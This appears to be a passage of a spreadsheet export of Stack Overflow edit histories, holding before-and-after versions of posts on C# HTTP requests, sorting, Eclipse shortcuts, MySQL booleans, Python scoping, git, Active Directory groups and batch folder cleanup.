post.Write(buffer, 0, buffer.Length);_x000D_
post.Close();_x000D_
_x000D_
// build response object_x000D_
HttpWebResponse response = request.GetResponse() as HttpWebResponse;_x000D_
Stream responsedata = response.GetResponseStream();_x000D_
StreamReader responsereader = new StreamReader(responsedata);_x000D_
response = responsereader.ReadToEnd();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The string variables at the start of the code are what you set, then you get a string &lt;span class="diff-delete"&gt; response&lt;/span&gt; (hopefully...) from the server.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've done something like this, building an xml request manually and then using the webrequest object to submit the request:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;            &lt;/span&gt;string data = "the xml document to submit";_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;string url = "the webservice url";_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;string response = "the response from the server";_x000D_
_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;// build request objects to pass the data/xml to the server_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;byte[] buffer = Encoding.ASCII.GetBytes(data);_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;request.Method = "POST";_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;request.ContentType = "application/x-www-form-urlencoded";_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;request.ContentLength = buffer.Length;_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;Stream post = request.GetRequestStream();_x000D_
_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;// post data and close connection_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;post.Write(buffer, 0, buffer.Length);_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;post.Close();_x000D_
_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;// build response object_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;HttpWebResponse response = request.GetResponse() as HttpWebResponse;_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;Stream responsedata = response.GetResponseStream();_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;StreamReader responsereader = new StreamReader(responsedata);_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;response = responsereader.ReadToEnd();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The string variables at the start of the code are what you set, then you get a string &lt;span class="diff-add"&gt;response&lt;/span&gt; (hopefully...) from the server.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Iain Holder</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Note: This is solution for .Net 2.0 where you can't use Linq, for .Net 4.0+ use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;OrderBy&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;/&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;ThanBy&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; as covered in other answer.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; You don't need a stable sort if you compare all members. For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public void SortList() {_x000D_
   MyList.Sort(delegate(MyClass a, MyClass b)_x000D_
   {_x000D_
      int xdiff = a.x.CompareTo(b.x);_x000D_
      if (xdiff != 0) return xdiff;_x000D_
      else return a.y.CompareTo(b.y);_x000D_
   });_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You don't need a stable sort if you compare all members. For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public void SortList() {_x000D_
   MyList.Sort(delegate(MyClass a, MyClass b)_x000D_
   {_x000D_
      int xdiff = a.x.CompareTo(b.x);_x000D_
      if (xdiff != 0) return xdiff;_x000D_
      else return a.y.CompareTo(b.y);_x000D_
   });_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Place the cursor just beyond an opening &lt;em&gt;or closing&lt;/em&gt; brace and punch &lt;kbd&gt;Ctrl&lt;/kbd&gt; + &lt;kbd&gt;Shift&lt;/kbd&gt; + &lt;kbd&gt;P&lt;/kbd&gt; to find the matching brace. If Eclipse can't find one you'll get a &lt;em&gt;"No matching bracket found"&lt;/em&gt; message.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;edit:&lt;/strong&gt;&lt;/em&gt; as &lt;a href="http://stackoverflow.com/a/1637242/1030"&gt;mentioned by Romaintaz below&lt;/a&gt;, you can also get Eclipse to auto-select all of the code between two curly braces simply by double-clicking to the immediate right of a opening brace.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;update&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; Starting Juno: Place the cursor next (either just before or just after) a bracket and punch &lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;Ctrl&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; + &lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;Shift&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; + &lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;P&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; to find the matching bracket. The same shortcut also works at other locations as well, i.e. pressing &lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;Ctrl&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; + &lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;Shift&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; + &lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;P&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; once takes you to the enclosing end bracket, pressing it again takes the cursor to the corresponding opening bracket, and pressing it a third time takes the caret to the original location - and then the cycle repeats.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Place the cursor just beyond an opening &lt;em&gt;or closing&lt;/em&gt; brace and punch &lt;kbd&gt;Ctrl&lt;/kbd&gt; + &lt;kbd&gt;Shift&lt;/kbd&gt; + &lt;kbd&gt;P&lt;/kbd&gt; to find the matching brace. If Eclipse can't find one you'll get a &lt;em&gt;"No matching bracket found"&lt;/em&gt; message.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;edit:&lt;/strong&gt;&lt;/em&gt; as &lt;a href="http://stackoverflow.com/a/1637242/1030"&gt;mentioned by Romaintaz below&lt;/a&gt;, you can also get Eclipse to auto-select all of the code between two curly braces simply by double-clicking to the immediate right of a opening brace.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ninesided</t>
  </si>
  <si>
    <t>Deepak Azad</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am new to decoding techniques. Just &lt;span class="diff-delete"&gt;learn't&lt;/span&gt; about base64, sha-1, md5 and a few others &lt;span class="diff-delete"&gt;Yesterday&lt;/span&gt;, while trying to figure out what orkut worms actually contain. I was attacked by many orkut spammers and hackers in the past few days. There is a similarity in the URLs they send to us. I don't know what information it contains but I need to figure it out. It lies in the following texts:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;2HdCawmglANyIsor5\x2F9rrsMTxMY=_x000D_
Foo+bZGMiDsstRKVgpjhlfxMVpM=_x000D_
lmKpr4+L6caaXii9iokloJ1A4xQ=_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The encoding above apparently seems to be base64 but it is not, because whenever I decode it using online base64 decoders I get raw output. It doesn't decode accurately. Maybe some other code has been mixed with base64. Can anyone please help me decode it, I'll be very grateful, thanks in advance.&lt;/p&gt; _x000D_
 &lt;p&gt; N-J.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am new to decoding techniques. Just &lt;span class="diff-add"&gt;learnt&lt;/span&gt; about base64, sha-1, md5 and a few others &lt;span class="diff-add"&gt;yesterday&lt;/span&gt;, while trying to figure out what orkut worms actually contain. I was attacked by many orkut spammers and hackers in the past few days. There is a similarity in the URLs they send to us. I don't know what information it contains but I need to figure it out. It lies in the following texts:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
    2HdCawmglANyIsor5\x2F9rrsMTxMY=_x000D_
    Foo+bZGMiDsstRKVgpjhlfxMVpM=_x000D_
    lmKpr4+L6caaXii9iokloJ1A4xQ=_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The encoding above apparently seems to be base64 but it is not, because whenever I decode it using online base64 decoders I get raw output. It doesn't decode accurately. Maybe some other code has been mixed with base64. Can anyone please help me decode it, I'll be very grateful, thanks in advance.&lt;/p&gt; _x000D_
 &lt;p&gt; N-J.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>xsl</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; According to the MySQL manual you can use bool and boolean which are at the moment aliases of tinyint(1):&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Bool, Boolean: These types are synonyms for TINYINT(1). A value of zero is considered false. Non-zero values are considered true.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; MySQL also states that:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; We intend to implement full boolean type handling, in accordance with standard SQL, in a future MySQL release.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; According to the MySQL manual you can use bool and boolean which are at the moment aliases of tinyint(1):&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Bool, Boolean: These types are synonyms for TINYINT(1). A value of zero is considered false. Non-zero values are considered true.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; MySQL also states that:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; We intend to implement full boolean type handling, in accordance with standard SQL, in a future MySQL release.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; BTW: this is just a matter of &lt;/span&gt;&lt;a href="http://www.google.ch/search?q=mysql+boolean+datatype" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.google.ch/search?q=mysql+boolean+datatype&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>markus</t>
  </si>
  <si>
    <t>David Murdoch</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to show a custom hint in a TWinControl but I can't figure out how to get it's position.&lt;/p&gt; _x000D_
 &lt;p&gt; Using position 0,0 shows the hint on the top of my screen (outside the window) so I guess it must be the position of the control on the screen.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to show a custom hint in a TWinControl but I can't figure out how to get it's position.&lt;/p&gt; _x000D_
 &lt;p&gt; Using position 0,0 shows the hint on the top of my screen (outside the window) so I guess it must be the position of the control on the screen.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Edit:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I've found the TControl Property ClientOrigin which returns what I've expected, is it correct to use ClientOrigin.X and ClientOrigin.Y?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Fabio Gomes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What &lt;strong&gt;exactly&lt;/strong&gt; are the Python scoping rules?&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; If I have some code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;code1_x000D_
&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Foo&lt;/span&gt;:&lt;/span&gt;_x000D_
   code2_x000D_
   &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;spam&lt;/span&gt;....._x000D_
      &lt;span class="hljs-title"&gt;code3&lt;/span&gt;_x000D_
      &lt;span class="hljs-title"&gt;for&lt;/span&gt; &lt;span class="hljs-title"&gt;code4&lt;/span&gt;..:&lt;/span&gt;_x000D_
       code5_x000D_
       x()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Where is &lt;em&gt;x&lt;/em&gt; found? Some possible choices include the list above:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; In the enclosing source file&lt;/li&gt; _x000D_
  &lt;li&gt; In the class namespace&lt;/li&gt; _x000D_
  &lt;li&gt; In the function definition&lt;/li&gt; _x000D_
  &lt;li&gt; In the for loop index variable&lt;/li&gt; _x000D_
  &lt;li&gt; Inside the for loop&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Also there is the context during execution, when the function spam is passed somewhere else. And maybe lambda functions pass a bit differently?&lt;/p&gt; _x000D_
 &lt;p&gt; There must be a simple reference or algorithm somewhere. It's a confusing world for intermediate Python programmers.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What &lt;strong&gt;exactly&lt;/strong&gt; are the Python scoping rules?&lt;/p&gt; _x000D_
 &lt;p&gt; If I have some code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;code1_x000D_
&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Foo&lt;/span&gt;:&lt;/span&gt;_x000D_
   code2_x000D_
   &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;spam&lt;/span&gt;....._x000D_
      &lt;span class="hljs-title"&gt;code3&lt;/span&gt;_x000D_
      &lt;span class="hljs-title"&gt;for&lt;/span&gt; &lt;span class="hljs-title"&gt;code4&lt;/span&gt;..:&lt;/span&gt;_x000D_
       code5_x000D_
       x()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Where is &lt;em&gt;x&lt;/em&gt; found? Some possible choices include the list above:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; In the enclosing source file&lt;/li&gt; _x000D_
  &lt;li&gt; In the class namespace&lt;/li&gt; _x000D_
  &lt;li&gt; In the function definition&lt;/li&gt; _x000D_
  &lt;li&gt; In the for loop index variable&lt;/li&gt; _x000D_
  &lt;li&gt; Inside the for loop&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Also there is the context during execution, when the function spam is passed somewhere else. And maybe lambda functions pass a bit differently?&lt;/p&gt; _x000D_
 &lt;p&gt; There must be a simple reference or algorithm somewhere. It's a confusing world for intermediate Python programmers.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm looking for a library like Cairo, just far faster. It has to be a library that works with C or Python. It also would be nice if I could output to PNG, and SVG. I am looking at Qt's arthur, but that's C++, and I'm not a fan. Any suggestions?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm looking for a library like Cairo, just far faster. It has to be a library that works with C or Python. It also would be nice if I could output to PNG, and SVG. I am looking at Qt's arthur, but that's C++, and I'm not a fan. Any suggestions?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit: another precondition is that it has to run under Linux.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sargun Dhillon</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;What are&lt;/span&gt; the &lt;span class="diff-delete"&gt;differences&lt;/span&gt; between &lt;code&gt;git pull&lt;/code&gt; and &lt;code&gt;git fetch&lt;/code&gt; in Git?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;What's&lt;/span&gt; the &lt;span class="diff-add"&gt;difference&lt;/span&gt; between &lt;code&gt;git pull&lt;/code&gt; and &lt;code&gt;git fetch&lt;/code&gt; in Git?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A program written in Visual C/C++ 2005/2008 might not compile with another compiler such as GNU C/C++. &lt;span class="diff-delete"&gt;For example when&lt;/span&gt; trying to reuse code, which uses windows.h, written for a particular compiler with another, what differences to be aware of?&lt;/p&gt; _x000D_
 &lt;p&gt; Is there any information about how to produce compatible with either one compiler or another e.g.&lt;span class="diff-delete"&gt; with&lt;/span&gt; either GC/C++ or MSVC/C++? What problems will attempting to do this cause?&lt;/p&gt; _x000D_
 &lt;p&gt; What about other compliers, such as LCC and Digital Mars?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A program written in Visual C/C++ 2005/2008 might not compile with another compiler such as GNU C/C++. &lt;span class="diff-add"&gt;When&lt;/span&gt; trying to reuse code, which uses windows.h, written for a particular compiler with another, what differences to be aware of&lt;span class="diff-add"&gt;, e.g. code written for Visual C/C++ with GCC/G++ or vice-versa&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; Is there any information about how to produce compatible with either one compiler or another e.g. either GC/C++ or MSVC/C++? What problems will attempting to do this cause?&lt;/p&gt; _x000D_
 &lt;p&gt; What about other compliers, such as LCC and Digital Mars?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;
            &lt;p&gt;I have finally got the green light to use Memcached in our project (after months of lobbying against a database-based caching solution - just don't ask...), however we will need to use Repcached as well to have backup copies of our data.  Has anyone built this for Win32?  We may end up using Linux in production, but development will very likely be taking place on Windows.&lt;/p&gt;
&lt;p&gt;Any hints or pointers are gratefully received - there appear to be lots of .T files, which I presume is TCL?  That could be fun...&lt;/p&gt;
        &lt;/div&gt;</t>
  </si>
  <si>
    <t>endian</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm astonished that the &lt;a href="http://commons.apache.org/collections/" rel="nofollow noreferrer"&gt;Apache Commons Collections&lt;/a&gt; project still hasn't got around to making their library generics-aware. I really like the features provided by this library, but the lack of support for generics is a big turn-off. There is a &lt;a href="http://larvalabs.com/collections/index.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;fork&lt;/span&gt; of Commons Collections which does support generics&lt;/a&gt;&lt;span class="diff-delete"&gt; (Larvalab Collections)&lt;/span&gt;, which seems to claim backward compatability, but when I tried updating to this version, my web application failed to start (in JBoss).&lt;/p&gt; _x000D_
 &lt;p&gt; My questions are:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Whether anyone has successfully updated from Commons Collections to the fork mentioned above&lt;/li&gt; _x000D_
  &lt;li&gt; If Commons Collections has any plans to add support for generics&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; BTW, I'm aware of Google collections, but can't use it, for reasons I don't quite understand.&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers, Don&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm astonished that the &lt;a href="http://commons.apache.org/collections/" rel="nofollow noreferrer"&gt;Apache Commons Collections&lt;/a&gt; project still hasn't got around to making their library generics-aware. I really like the features provided by this library, but the lack of support for generics is a big turn-off. There is a &lt;a href="http://larvalabs.com/collections/index.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Lavalabs fork&lt;/span&gt; of Commons Collections which does support generics&lt;/a&gt;, which seems to claim backward compatability, but when I tried updating to this version, my web application failed to start (in JBoss).&lt;/p&gt; _x000D_
 &lt;p&gt; My questions are:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Whether anyone has successfully updated from Commons Collections to the fork mentioned above&lt;/li&gt; _x000D_
  &lt;li&gt; If Commons Collections has any plans to add support for generics&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; BTW, I'm aware of Google collections, but can't use it, for reasons I don't quite understand.&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers, Don&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dónal</t>
  </si>
  <si>
    <t>Ken Gentle</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a .NET application distributed through clickonce. Security within the application is implemented through the WindowsPrincipal.IsInRole(GroupName) method using a set of groups as resources. This structure works well for us for users within the same domain as the groups. Unfortunately we now have users that need to use the application working on machines and using user accounts in a different domain that is trusted by our domain but is not in the same forest.&lt;/p&gt; _x000D_
 &lt;p&gt; It seems that IsInRole() queries the AD ticket on the local machine for group membership. Unfortunately this ticket only contains domain-local groups for the domain of the machine and global and universal groups of other trusted domains, our groups are domain-local groups in the first domain. The catch-22 situation comes from the fact that AD does not allow foreign security principals in either global or universal groups and therefore while it can be queried by the users in the second domain they cannot be members of it (making it a little pointless!)&lt;/p&gt; _x000D_
 &lt;p&gt; To explain: There are two domains: DOM1 and DOM2 with a trust setup between them, but they are not in the same forest.&lt;/p&gt; _x000D_
 &lt;p&gt; DOM1\User1&lt;br&gt; DOM2\User2&lt;br&gt; are two users.&lt;/p&gt; _x000D_
 &lt;p&gt; I would like to put both User1 and User2 in one group that is visible to both users and can contain them both.&lt;/p&gt; _x000D_
 &lt;p&gt; The only way I can currently see around it is the following (where {} denotes the members of the groups, DL=Domain Local and GLO=GlobalGroup.)&lt;/p&gt; _x000D_
 &lt;p&gt; Make two global groups one in each domain:&lt;br&gt; DOM1\GLOGroup1 : {DOM1\User1}&lt;br&gt; DOM2\GLOGroup1 : {DOM2\User2}&lt;/p&gt; _x000D_
 &lt;p&gt; and two domain-local groups containing the two global groups:&lt;br&gt; DOM1\DLGroup1 : {DOM1\GLOGroup1, DOM2\GLOGroup1}&lt;br&gt; DOM2\DLGroup1 : {DOM1\GLOGroup1, DOM2\GLOGroup1}&lt;/p&gt; _x000D_
 &lt;p&gt; But this isn't really acceptable as we actually have more than two domains and about 70 groups to administer including a hierarchy of groups and we don't have much direct control over the administration of groups in the other domains.&lt;/p&gt; _x000D_
 &lt;p&gt; We haven't yet worked through any thinking on an approach using LDAP but from the little that I've read I believe it's not generally recommended for this purpose?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a .NET application distributed through clickonce. Security within the application is implemented through the WindowsPrincipal.IsInRole(GroupName) method using a set of groups as resources. This structure works well for us for users within the same domain as the groups. Unfortunately we now have users that need to use the application working on machines and using user accounts in a different domain that is trusted by our domain but is not in the same forest.&lt;/p&gt; _x000D_
 &lt;p&gt; It seems that IsInRole() queries the AD ticket on the local machine for group membership. Unfortunately this ticket only contains domain-local groups for the domain of the machine and global and universal groups of other trusted domains, our groups are domain-local groups in the first domain. The catch-22 situation comes from the fact that AD does not allow foreign security principals in either global or universal groups and therefore while it can be queried by the users in the second domain they cannot be members of it (making it a little pointless!)&lt;/p&gt; _x000D_
 &lt;p&gt; To explain: There are two domains: DOM1 and DOM2 with a trust setup between them, but they are not in the same forest.&lt;/p&gt; _x000D_
 &lt;p&gt; DOM1\User1&lt;br&gt; DOM2\User2&lt;br&gt; are two users.&lt;/p&gt; _x000D_
 &lt;p&gt; I would like to put both User1 and User2 in one group that is visible to both users and can contain them both.&lt;/p&gt; _x000D_
 &lt;p&gt; The only way I can currently see around it is the following (where {} denotes the members of the groups, DL=Domain Local and GLO=GlobalGroup.)&lt;/p&gt; _x000D_
 &lt;p&gt; Make two global groups one in each domain:&lt;br&gt; DOM1\GLOGroup1 : {DOM1\User1}&lt;br&gt; DOM2\GLOGroup1 : {DOM2\User2}&lt;/p&gt; _x000D_
 &lt;p&gt; and two domain-local groups containing the two global groups:&lt;br&gt; DOM1\DLGroup1 : {DOM1\GLOGroup1, DOM2\GLOGroup1}&lt;br&gt; DOM2\DLGroup1 : {DOM1\GLOGroup1, DOM2\GLOGroup1}&lt;/p&gt; _x000D_
 &lt;p&gt; But this isn't really acceptable as we actually have more than two domains and about 70 groups to administer including a hierarchy of groups and we don't have much direct control over the administration of groups in the other domains.&lt;/p&gt; _x000D_
 &lt;p&gt; We haven't yet worked through any thinking on an approach using LDAP but from the little that I've read I believe it's not generally recommended for this purpose?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Any help or thoughts would be greatly appreciated.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Many Thanks&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Stu&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; unknown folder delete within a directory using .BAT files&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I have a folder &lt;span class="diff-delete"&gt;FolderA&lt;/span&gt; which contains three &lt;span class="diff-delete"&gt;subfolders&lt;/span&gt; foldera1&lt;span class="diff-delete"&gt;,&lt;/span&gt; foldera2 and foldera3&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I need to write a batch file which resides inside &lt;span class="diff-delete"&gt;folderA, which&lt;/span&gt; should delete all the folders under &lt;span class="diff-delete"&gt;FolderA&lt;/span&gt; as a cleanup activity.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; I don't know the folder names. &lt;span class="diff-delete"&gt;rmdir&lt;/span&gt; does not support wild cards.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Can&lt;/span&gt; someone provide a solution for this small problem?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a folder &lt;span class="diff-add"&gt;"FolderA"&lt;/span&gt; which contains three &lt;span class="diff-add"&gt;sub-folders:&lt;/span&gt; foldera1 foldera2 and foldera3&lt;/p&gt; _x000D_
